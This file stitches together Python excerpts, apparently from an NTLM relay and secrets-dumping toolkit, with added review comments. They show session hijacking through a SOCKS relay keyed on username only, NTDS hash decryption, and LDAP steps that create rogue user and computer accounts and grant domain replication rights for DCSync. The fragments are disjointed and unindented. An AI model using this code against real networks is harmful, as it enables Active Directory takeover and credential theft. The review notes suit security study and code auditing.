# Excerpt from the SMTP side of a SOCKS relay plugin. The enclosing method and
# the `if` that opens this chain (the AUTH LOGIN case) start above these lines.
# '334 VXNlcm5hbWU6' is the AUTH LOGIN prompt: base64 of "Username:".
self.socksSocket.send('334 VXNlcm5hbWU6'+EOL)
# Client will now send their AUTH
data = self.socksSocket.recv(self.packetSize)
# This contains base64(username), decode
# NOTE(review): `data` is client-controlled and b64decode raises on malformed
# input; no handler is visible in this excerpt.
creds = base64.b64decode(data.strip())
self.username = creds.upper()
# Client will now send the password, we don't care for it but receive it anyway
# ('334 UGFzc3dvcmQ6' is base64 of "Password:"). The reply is read and never
# checked, so the session picked below depends on the username alone.
# NOTE(review): access control therefore rests on who can reach this listener -
# confirm the bind address and any filtering in front of it.
self.socksSocket.send('334 UGFzc3dvcmQ6'+EOL)
data = self.socksSocket.recv(self.packetSize)
elif cmd.upper() == 'AUTH' and args[0] == 'PLAIN':
# Simple login
# This contains base64(\x00username\x00password), decode and split
# NOTE(review): args[1] and the [1] after split() raise IndexError when the
# client omits the argument or the decoded blob has no NUL separator.
creds = base64.b64decode(args[1].strip())
self.username = creds.split('\x00')[1].upper()
else:
# `cmd` is client-supplied text and is written to the log as received.
# NOTE(review): `params` is not assigned in the visible lines - presumably set
# where the command line is parsed; confirm.
LOG.error('SMTP: Socks plugin expected AUTH PLAIN or AUTH LOGIN command, but got: %s %s' % (cmd, params))
return False
# Check if we have a connection for the user
# (dict.has_key exists only in Python 2; `in` is the portable spelling.)
if self.activeRelays.has_key(self.username):
# Check the connection is not inUse
# NOTE(review): the flag is tested here and the session is taken below with no
# lock visible in this excerpt - confirm how concurrent clients are handled.
if self.activeRelays[self.username]['inUse'] is True:
LOG.error('SMTP: Connection for %s@%s(%s) is being used at the moment!' % (
self.username, self.targetHost, self.targetPort))
return False
else:
LOG.info('SMTP: Proxying client session for %s@%s(%s)' % (
self.username, self.targetHost, self.targetPort))
# Reuse the already-established session stored for this username.
self.session = self.activeRelays[self.username]['protocolClient'].session
else:
LOG.error('SMTP: No session for %s@%s(%s) available' % (
self.username, self.targetHost, self.targetPort))
# The excerpt ends here; what follows this log call is not shown.
# Excerpt from the IMAP side of a SOCKS relay plugin. The enclosing method and
# the `if` that opens this chain (the AUTHENTICATE PLAIN case, going by the
# error message below) start above these lines; `tag`, `cmd` and `args` are
# set there.
data = self.socksSocket.recv(self.packetSize)
# This contains base64(\x00username\x00password), decode and split
# NOTE(review): `data` is client-controlled. b64decode raises on malformed
# input and the [1] raises IndexError when the blob has no NUL separator; no
# handler is visible in this excerpt.
creds = base64.b64decode(data.strip())
self.username = creds.split('\x00')[1].upper()
elif args[0].upper() == 'LOGIN':
# Simple login
# Only the username (args[1]) is read in this branch; no password is used.
self.username = args[1].upper()
else:
LOG.error('IMAP: Socks plugin expected LOGIN or AUTHENTICATE PLAIN command, but got: %s' % cmd)
return False
# Check if we have a connection for the user
# (dict.has_key exists only in Python 2; `in` is the portable spelling.)
# The session is selected by username alone, so access control rests on who can
# reach this listener - NOTE(review): confirm the bind address.
if self.activeRelays.has_key(self.username):
# Check the connection is not inUse
if self.activeRelays[self.username]['inUse'] is True:
LOG.error('IMAP: Connection for %s@%s(%s) is being used at the moment!' % (
self.username, self.targetHost, self.targetPort))
return False
else:
LOG.info('IMAP: Proxying client session for %s@%s(%s)' % (
self.username, self.targetHost, self.targetPort))
# Reuse the already-established session stored for this username.
self.session = self.activeRelays[self.username]['protocolClient'].session
else:
LOG.error('IMAP: No session for %s@%s(%s) available' % (
self.username, self.targetHost, self.targetPort))
return False
# We arrived here, that means all is OK
# Report success to the client under its own tag, then expose the stored
# session's socket and file object for the proxying that follows.
self.socksSocket.sendall('%s OK %s completed.%s' % (tag, args[0].upper(), EOL))
self.relaySocket = self.session.sock
self.relaySocketFile = self.session.file
return True
# Excerpt from a file-create wrapper. `ntCreate`, `packetPathName`, `flags2`
# and the `if` that the `else:` below belongs to are set up above these lines.
# Copy the caller's arguments into the request's parameter block.
ntCreate['Parameters']['FileNameLength']= len(packetPathName)
ntCreate['Parameters']['AccessMask'] = desiredAccess
ntCreate['Parameters']['FileAttributes']= fileAttributes
ntCreate['Parameters']['ShareAccess'] = shareMode
ntCreate['Parameters']['Disposition'] = creationDisposition
ntCreate['Parameters']['CreateOptions'] = creationOption
ntCreate['Parameters']['Impersonation'] = impersonationLevel
ntCreate['Parameters']['SecurityFlags'] = securityFlags
# Hard-coded flag value; its meaning is not shown in this excerpt.
ntCreate['Parameters']['CreateFlags'] = 0x16
ntCreate['Data']['FileName'] = packetPathName
# A pad byte is set only when the Unicode flag is on - presumably to align the
# UTF-16 file name; confirm against the structure definition.
if flags2 & smb.SMB.FLAGS2_UNICODE:
ntCreate['Data']['Pad'] = 0x0
# NOTE(review): create contexts are only logged as unsupported; the request is
# still sent without them rather than being refused.
if createContexts is not None:
LOG.error("CreateContexts not supported in SMB1")
try:
return self._SMBConnection.nt_create_andx(treeId, pathName, cmd = ntCreate)
except (smb.SessionError, smb3.SessionError) as e:
# Re-raise as this module's SessionError, keeping the error code and packet.
raise SessionError(e.get_error_code(), e.get_error_packet())
else:
# Other branch of the `if` above the excerpt: all arguments, including
# createContexts and oplockLevel, are passed straight to create().
try:
return self._SMBConnection.create(treeId, pathName, desiredAccess, shareMode, creationOption,
creationDisposition, fileAttributes, impersonationLevel,
securityFlags, oplockLevel, createContexts)
except (smb.SessionError, smb3.SessionError) as e:
raise SessionError(e.get_error_code(), e.get_error_packet())
# Excerpt from a routine that walks database rows and decrypts what it finds;
# the enclosing method starts above and the last `try` continues below.
# The syntax here (`except Exception, e`, the print statement) is Python 2 only.
# First pass: rows that were set aside earlier in self.__tmpUsers.
for record in self.__tmpUsers:
try:
self.__decryptHash(record, outputFile=hashesOutputFile)
# Supplemental info is skipped when only NTLM output was requested.
if self.__justNTLM is False:
self.__decryptSupplementalInfo(record, None, keysOutputFile, clearTextOutputFile)
except Exception, e:
# The traceback is shown only when the root logger level is exactly DEBUG.
if logging.getLogger().level == logging.DEBUG:
import traceback
# NOTE(review): print_exc() writes the traceback itself and returns None, so
# this also prints a stray "None" line.
print traceback.print_exc()
# One bad row must not stop the run: log it and move on. The inner try covers
# the case where reading the row's name fails as well.
try:
LOG.error(
"Error while processing row for user %s" % record[self.NAME_TO_INTERNAL['name']])
LOG.error(str(e))
pass
except:
# NOTE(review): bare except - it also catches KeyboardInterrupt and SystemExit.
LOG.error("Error while processing row!")
LOG.error(str(e))
pass
# Now let's keep moving through the NTDS file and decrypting what we find
while True:
try:
record = self.__ESEDB.getNextRow(self.__cursor)
except:
# NOTE(review): bare except followed by `continue`. Whether the cursor advances
# after a failure is not visible here; if it does not, this loop never ends.
LOG.error('Error while calling getNextRow(), trying the next one')
continue
# getNextRow() returning None marks the end of the table.
if record is None:
break
try:
# Only rows whose account type is in ACCOUNT_TYPES are decrypted.
if record[self.NAME_TO_INTERNAL['sAMAccountType']] in self.ACCOUNT_TYPES:
self.__decryptHash(record, outputFile=hashesOutputFile)
# Tail of an attribute dictionary for a new user object; the opening of the
# literal and the enclosing function start above these lines.
'cn': newUser,
'sn': newUser,
'givenName': newUser,
'displayName': newUser,
'name': newUser,
# 512 is the NORMAL_ACCOUNT flag (0x0200): an enabled, ordinary user account.
'userAccountControl': 512,
'accountExpires': '0',
'sAMAccountName': newUser,
# The password is sent as the quoted string encoded in UTF-16LE.
'unicodePwd': '"{}"'.format(newPassword).encode('utf-16-le')
}
LOG.info('Attempting to create user in: %s', parent)
res = self.client.add(newUserDn, ['top', 'person', 'organizationalPerson', 'user'], ucd)
if not res:
# Adding users requires LDAPS
# The hint below is given only when the server refused the operation and the
# connection is not using SSL; any other failure logs the raw result.
if self.client.result['result'] == RESULT_UNWILLING_TO_PERFORM and not self.client.server.ssl:
LOG.error('Failed to add a new user. The server denied the operation. Try relaying to LDAP with TLS enabled (ldaps) or escalating an existing user.')
else:
LOG.error('Failed to add a new user: %s' % str(self.client.result))
return False
else:
# NOTE(review): the cleartext password is written to the log at INFO level, so
# anyone who can read the log or console output obtains the credential.
LOG.info('Adding new user with username: %s and password: %s result: OK' % (newUser, newPassword))
# Return the DN
return newUserDn
def initConnection(self):
    """Open the SMTP session to the target and check that it offers NTLM.

    Connects to ``self.targetHost`` on ``self.targetPort``, stores the
    connection in ``self.session`` and sends EHLO.

    Returns:
        True when the EHLO response contains 'AUTH NTLM', otherwise False
        (after logging an error).
    """
    # NOTE(review): no timeout is passed and no STARTTLS is issued here; on the
    # False path the connection stays open in self.session.
    smtp = smtplib.SMTP(self.targetHost, self.targetPort)
    self.session = smtp
    # Turn on to debug SMTP messages
    # self.session.debuglevel = 3
    smtp.ehlo()

    ntlm_offered = 'AUTH NTLM' in smtp.ehlo_resp
    if ntlm_offered:
        return True
    LOG.error('SMTP server does not support NTLM authentication!')
    return False
def addComputer(self, parent, domainDumper):
"""
Add a new computer. Parent is preferably CN=computers,DC=Domain,DC=local, but can
also be an OU or other container where we have write privileges

domainDumper supplies the domain's root DN through its ``root`` attribute.
The function continues past this excerpt; ``parent`` is not used in the
visible lines.
"""
# Module-level flag: at most one computer account is added per process.
global alreadyAddedComputer
if alreadyAddedComputer:
LOG.error('New computer already added. Refusing to add another')
return
# Random password
# NOTE(review): `random` is not a cryptographic generator. For a credential,
# secrets.choice or random.SystemRandom().choice is the drop-in replacement.
newPassword = ''.join(random.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(15))
# Get the domain we are in
domaindn = domainDumper.root
# Turn the root DN into a dotted name: start at the first 'DC=', replace each
# ',DC=' (any case) with '.', then drop the leading 'DC='.
domain = re.sub(',DC=', '.', domaindn[domaindn.find('DC='):], flags=re.I)[3:]
computerName = self.computerName
if computerName == '':
# Random computername
# Eight random letters plus the trailing '$', upper-cased.
newComputer = (''.join(random.choice(string.ascii_letters) for _ in range(8)) + '$').upper()
else:
# Use the configured name, adding the trailing '$' when it is missing.
newComputer = computerName if computerName.endswith('$') else computerName + '$'
def get_address(self):
    """Return the address held in this structure's buffer.

    The raw bytes are read with ``get_bytes(self.buffer, 5, length)``, where
    ``length`` comes from ``get_address_length()``.

    Returns:
        The dotted-quad string when the protocol is
        ``AddressDetails.PROTOCOL_IP``; otherwise the raw bytes, after an
        error is logged.
    """
    raw = get_bytes(self.buffer, 5, self.get_address_length())
    if self.get_protocol() != AddressDetails.PROTOCOL_IP:
        # Callers get a different type on this path (raw bytes, not text).
        LOG.error("Address not IP")
        return raw
    # NOTE(review): inet_ntoa accepts exactly four bytes; the length comes
    # from the buffer itself and is not checked here before the call.
    return socket.inet_ntoa(raw)
def addUser(self, parent, domainDumper):
"""
Add a new user. Parent is preferably CN=Users,DC=Domain,DC=local, but can
also be an OU or other container where we have write privileges

domainDumper supplies the domain's root DN through its ``root`` attribute.
The function continues past this excerpt, which ends inside the attribute
dictionary.
"""
# Module-level flag: once it is set, no further user is added by this process.
global alreadyEscalated
if alreadyEscalated:
LOG.error('New user already added. Refusing to add another')
return
# Random password
# NOTE(review): `random` is not a cryptographic generator. For a credential,
# secrets.choice or random.SystemRandom().choice is the drop-in replacement.
newPassword = ''.join(random.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(15))
# Random username
# Ten random ASCII letters.
newUser = ''.join(random.choice(string.ascii_letters) for _ in range(10))
# The new object's DN is built directly under the given parent container.
newUserDn = 'CN=%s,%s' % (newUser, parent)
# Attributes for the new object; every naming attribute reuses the username.
ucd = {
'objectCategory': 'CN=Person,CN=Schema,CN=Configuration,%s' % domainDumper.root,
'distinguishedName': newUserDn,
'cn': newUser,
'sn': newUser,
'givenName': newUser,
'displayName': newUser,
'name': newUser,
# Excerpt from the success branch of an ACL update. The enclosing function, the
# `if` matched by the `else:` below, and the names `username`, `dn`, `controls`
# and `restoredata` are all set above these lines.
# Record that the change was made (the `global` declaration is not visible here).
alreadyEscalated = True
LOG.info('Success! User %s now has Replication-Get-Changes-All privileges on the domain', username)
LOG.info('Try using DCSync with secretsdump.py and this user :)')
# Query the SD again to see what AD made of it
self.client.search(domainDumper.root, '(&(objectCategory=domain))', attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
# NOTE(review): the first entry is used without checking that the search
# returned one; an empty result raises IndexError here.
entry = self.client.entries[0]
newSD = entry['nTSecurityDescriptor'].raw_values[0]
# Save this to restore the SD later on
# The descriptor is stored hex-encoded so that it can be written out as text.
restoredata['target_dn'] = dn
restoredata['new_sd'] = binascii.hexlify(newSD).decode('utf-8')
restoredata['success'] = True
self.writeRestoreData(restoredata, dn)
# Defender note: this path leaves a changed nTSecurityDescriptor on the domain
# object, which directory-service change auditing records when it is enabled.
return True
else:
LOG.error('Error when updating ACL: %s' % self.client.result)
return False